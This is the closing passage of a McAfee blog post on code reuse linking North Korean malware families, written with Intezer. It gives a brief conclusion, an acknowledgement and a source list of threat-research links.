We clearly saw a lot of code reuse over the many years of cyber campaigns we examined. This indicates the North Koreans have groups with different skills and tools that execute their focused parts of cyber operations while also working in parallel when large campaigns require a mix of skills and tools.

We found our months of research, data gathering, and analysis very satisfying. By combining our skills, data, and technology, we were able to draw connections and reveal links that we had not seen before. The cybersecurity industry would greatly benefit from more collaboration and sharing of information, and we hope that this effort between McAfee and Intezer will inspire the community to work together more often.

The authors thank Costin Raiu for providing them with samples they did not have in their collections.

Sources

Glenn Simpson, Gordon Fairclough, and Jay Solomon, “U.S. Probes Banks’ North Korea Ties.” Wall Street Journal, last updated September 8, 2005.

Christiaan Beek, “Attacks on SWIFT Banking system benefit from insider knowledge.” https://securingtomorrow.mcafee.com/mcafee-labs/attacks-swift-banking-system-benefit-insider-knowledge/

Atif Mushtaq, “DDOS Madness Continued…” https://www.fireeye.com/blog/threat-research/2009/07/ddos-madness-climax.html

Ryan Sherstobitoff and Jessica Saavedra-Morales, “Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems.” https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/ 

Alex Drozhzhin, “Darkhotel: a spy campaign in luxury Asian hotels.” https://www.kaspersky.com/blog/darkhotel-apt/6613/ 

Warren Mercer, Paul Rascagneres, and Jungsoo An, “NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea.” https://blog.talosintelligence.com/2018/05/navrat.html 

Sergei Shevchenko and Adrian Nish, “Cyber Heist Attribution.” https://baesystemsai.blogspot.com/2016/05/cyber-heist-attribution.html

Mydoom code reuse report. https://analyze.intezer.com/#/analyses/113ba80f-1680-43d7-b287-cc62f3740fad

NavRAT code reuse report. https://analyze.intezer.com/#/analyses/4f19fd5a-a898-4fdf-96c9-d3a4aad817cb

SierraBravo code reuse report. https://analyze.intezer.com/#/analyses/8da8104e-56e4-49fd-ba24-82978bc1610c

Dark Hotel code reuse report. https://analyze.intezer.com/#/analyses/c034e0fe-7825-4f6d-b092-7c5ee693aff4

Kang Jang-ho, “A foreign currency earned with a virtual currency … What is the life of a North Korean hacker?” http://m.mtn.co.kr/news/news_view.php?mmn_idx=2018062517065863930#_enliple

Awesome work by the team responsible for the “Operation Blockbuster” report. https://www.operationblockbuster.com/resources/

The post Examining Code Reuse Reveals Undiscovered Links Among North Korea’s Malware Families appeared first on McAfee Blogs.